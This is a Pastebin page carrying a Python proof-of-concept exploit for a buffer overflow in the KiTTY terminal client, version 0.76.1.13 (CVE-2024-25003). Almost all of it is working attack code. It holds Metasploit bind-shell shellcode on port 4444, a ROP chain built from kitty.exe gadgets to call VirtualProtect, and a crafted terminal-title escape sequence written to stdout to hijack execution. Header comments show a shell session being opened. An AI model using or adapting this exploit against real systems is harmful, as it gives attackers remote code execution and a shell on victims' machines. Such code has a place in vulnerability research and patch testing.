Advertisement
FlyFar

KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow - CVE-2024-25003

Mar 14th, 2024
817
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.87 KB | Cybersecurity | 0 0
  1. # Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow
  2. # Exploit Author: DEFCESCO (Austin A. DeFrancesco)
  3. # Vendor Homepage: https://github.com/cyd01/KiTTY/=
  4. # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
  5. # Version: ≤ 0.76.1.13
  6. # Tested on: Microsoft Windows 11/10/8/7/XP
  7. # CVE: 2024-25003
  8. #-------------------------------------------------------------------------------------#
  9. # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY
  10. #-------------------------------------------------------------------------------------#
  11. # msf6 payload(windows/shell_bind_tcp) > to_handler                                   #
  12. # [*] Payload Handler Started as Job 1                                                #
  13. # msf6 payload(windows/shell_bind_tcp) >                                              #
  14. # [*] Started bind TCP handler against 192.168.100.28:4444                            #
  15. # [*] Command shell session 1 opened (192.168.100.119:39315 -> 192.168.100.28:4444)   #
  16. #-------------------------------------------------------------------------------------#
  17.  
  18. import sys
  19. import os
  20. import struct
  21.  
  22. #---------------------------------------------------------------------------------------------#
  23. # msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c\x3A\x40' -f py #
  24. # windows/shell_bind_tcp - 375 bytes                                                          #
  25. # https://metasploit.com/                                                                     #
  26. # Encoder: x86/xor_poly                                                                       #
  27. # VERBOSE=false, LPORT=4444, RHOST=192.168.100.28,                                            #
  28. # PrependMigrate=false, EXITFUNC=process, CreateSession=true,                                 #
  29. # AutoVerifySession=true                                                                      #
  30. #---------------------------------------------------------------------------------------------#
  31.  
  32. buf =  b""
  33. buf += b"\x51\x53\x56\x57\xdb\xd9\xd9\x74\x24\xf4\x5f\x41"
  34. buf += b"\x49\x31\xc9\x51\x59\x90\x90\x81\xe9\xae\xff\xff"
  35. buf += b"\xff\xbe\xd4\xa1\xc4\xf4\x31\x77\x2b\x83\xef\xfc"
  36. buf += b"\x51\x59\x90\xff\xc9\x75\xf3\x5f\x5e\x5b\x59\x28"
  37. buf += b"\x49\x46\xf4\xd4\xa1\xa4\x7d\x31\x90\x04\x90\x5f"
  38. buf += b"\xf1\xf4\x7f\x86\xad\x4f\xa6\xc0\x2a\xb6\xdc\xdb"
  39. buf += b"\x16\x8e\xd2\xe5\x5e\x68\xc8\xb5\xdd\xc6\xd8\xf4"
  40. buf += b"\x60\x0b\xf9\xd5\x66\x26\x06\x86\xf6\x4f\xa6\xc4"
  41. buf += b"\x2a\x8e\xc8\x5f\xed\xd5\x8c\x37\xe9\xc5\x25\x85"
  42. buf += b"\x2a\x9d\xd4\xd5\x72\x4f\xbd\xcc\x42\xfe\xbd\x5f"
  43. buf += b"\x95\x4f\xf5\x02\x90\x3b\x58\x15\x6e\xc9\xf5\x13"
  44. buf += b"\x99\x24\x81\x22\xa2\xb9\x0c\xef\xdc\xe0\x81\x30"
  45. buf += b"\xf9\x4f\xac\xf0\xa0\x17\x92\x5f\xad\x8f\x7f\x8c"
  46. buf += b"\xbd\xc5\x27\x5f\xa5\x4f\xf5\x04\x28\x80\xd0\xf0"
  47. buf += b"\xfa\x9f\x95\x8d\xfb\x95\x0b\x34\xfe\x9b\xae\x5f"
  48. buf += b"\xb3\x2f\x79\x89\xc9\xf7\xc6\xd4\xa1\xac\x83\xa7"
  49. buf += b"\x93\x9b\xa0\xbc\xed\xb3\xd2\xd3\x5e\x11\x4c\x44"
  50. buf += b"\xa0\xc4\xf4\xfd\x65\x90\xa4\xbc\x88\x44\x9f\xd4"
  51. buf += b"\x5e\x11\x9e\xdc\xf8\x94\x16\x29\xe1\x94\xb4\x84"
  52. buf += b"\xc9\x2e\xfb\x0b\x41\x3b\x21\x43\xc9\xc6\xf4\xc5"
  53. buf += b"\xfd\x4d\x12\xbe\xb1\x92\xa3\xbc\x63\x1f\xc3\xb3"
  54. buf += b"\x5e\x11\xa3\xbc\x16\x2d\xcc\x2b\x5e\x11\xa3\xbc"
  55. buf += b"\xd5\x28\xcf\x35\x5e\x11\xa3\x43\xc9\xb1\x9a\x99"
  56. buf += b"\xc0\x3b\x21\xbc\xc2\xa9\x90\xd4\x28\x27\xa3\x83"
  57. buf += b"\xf6\xf5\x02\xbe\xb3\x9d\xa2\x36\x5c\xa2\x33\x90"
  58. buf += b"\x85\xf8\xf5\xd5\x2c\x80\xd0\xc4\x67\xc4\xb0\x80"
  59. buf += b"\xf1\x92\xa2\x82\xe7\x92\xba\x82\xf7\x97\xa2\xbc"
  60. buf += b"\xd8\x08\xcb\x52\x5e\x11\x7d\x34\xef\x92\xb2\x2b"
  61. buf += b"\x91\xac\xfc\x53\xbc\xa4\x0b\x01\x1a\x34\x41\x76"
  62. buf += b"\xf7\xac\x52\x41\x1c\x59\x0b\x01\x9d\xc2\x88\xde"
  63. buf += b"\x21\x3f\x14\xa1\xa4\x7f\xb3\xc7\xd3\xab\x9e\xd4"
  64. buf += b"\xf2\x3b\x21"
  65.  
  66.  
  67. def shellcode():
  68.     sc = b''
  69.     sc += b'\xBB\x44\x24\x44\x44' # mov    ebx,0x44442444
  70.     sc += b'\xB8\x44\x44\x44\x44' # mov    eax,0x44444444
  71.     sc += b'\x29\xD8'             # sub    eax,ebx
  72.     sc += b'\x29\xC4'             # sub    esp,eax
  73.     sc += buf
  74.     sc += b'\x90' * (1052-len(sc))
  75.     assert len(sc) == 1052
  76.     return sc
  77.  
  78.  
  79. def create_rop_chain():
  80.  
  81.     # rop chain generated with mona.py - www.corelan.be
  82.     rop_gadgets = [
  83.     #[---INFO:gadgets_to_set_esi:---]
  84.     0x004c5832,  # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
  85.     0x006424a4,  # ptr to &VirtualProtect() [IAT kitty.exe]
  86.     0x41414141,  # Filler (compensate)
  87.     0x41414141,  # Filler (compensate)
  88.     0x41414141,  # Filler (compensate)
  89.     0x41414141,  # Filler (compensate)
  90.     0x41414141,  # Filler (compensate)
  91.     0x41414141,  # Filler (compensate)
  92.     0x41414141,  # Filler (compensate)
  93.     0x00484e07,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
  94.     0x00473cf6,  # XCHG EAX,ESI # RETN [kitty.exe]
  95.     #[---INFO:gadgets_to_set_ebp:---]
  96.     0x00429953,  # POP EBP # RETN [kitty.exe]
  97.     0x005405b0, # push esp; ret 0 [kitty.exe]
  98.     #[---INFO:gadgets_to_set_ebx:---]
  99.     0x0049d9f9,  # POP EBX # RETN [kitty.exe]
  100.     0x00000201,  # 0x00000201-> ebx
  101.     #[---INFO:gadgets_to_set_edx:---]
  102.     0x00430dce,  # POP EDX # RETN [kitty.exe]
  103.     0x00000040,  # 0x00000040-> edx
  104.     #[---INFO:gadgets_to_set_ecx:---]
  105.     0x005ac58c,  # POP ECX # RETN [kitty.exe]
  106.     0x004d81d9,  # &Writable location [kitty.exe]
  107.     #[---INFO:gadgets_to_set_edi:---]
  108.     0x004fa404,  # POP EDI # RETN [kitty.exe]
  109.     0x005a2001,  # RETN (ROP NOP) [kitty.exe]
  110.     #[---INFO:gadgets_to_set_eax:---]
  111.     0x004cd011,  # POP EAX # POP EBX # RETN [kitty.exe]
  112.     0x90909090,  # nop
  113.     0x41414141,  # Filler (compensate)
  114.     #[---INFO:pushad:---]
  115.     0x005dfbac,  # PUSHAD # RETN [kitty.exe]
  116.     ]
  117.     return b''.join(struct.pack('<I', _) for _ in rop_gadgets)
  118.  
  119. rop_chain = create_rop_chain()
  120.  
  121.  
  122. #----------------------------------------------------------------------------------#
  123. # Badchars: \x00\x07\x0a\x0d\x1b\x9c\x3A\x40                                       #
  124. # Return Address Information: 0x0052033c : {pivot 332 / 0x14c} :                   #
  125. #   ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN                     #
  126. #   ** [kitty.exe] **   |  startnull,ascii {PAGE_EXECUTE_READWRITE}                #
  127. # Shellcode size at ESP: 1052                                                      #
  128. #----------------------------------------------------------------------------------#
  129.  
  130. return_address = struct.pack('<I',  0x0052033c) # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN    ** [kitty.exe] **   |  startnull,ascii {PAGE_EXECUTE_READWRITE}
  131.  
  132. rop_chain_padding = b'\x90' * 35
  133. nops = b'\x90' * 88
  134.  
  135. escape_sequence = b'\033]0;__dt:' + shellcode() + return_address
  136. escape_sequence += rop_chain_padding + rop_chain
  137. escape_sequence += b'\x90'
  138. escape_sequence += b"\xE9\x2A\xFA\xFF\xFF" #jmp $eip-1490
  139. escape_sequence += nops + b'\007'
  140.  
  141. stdout = os.fdopen(sys.stdout.fileno(), 'wb')
  142. stdout.write(escape_sequence)
  143. stdout.flush()
  144.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement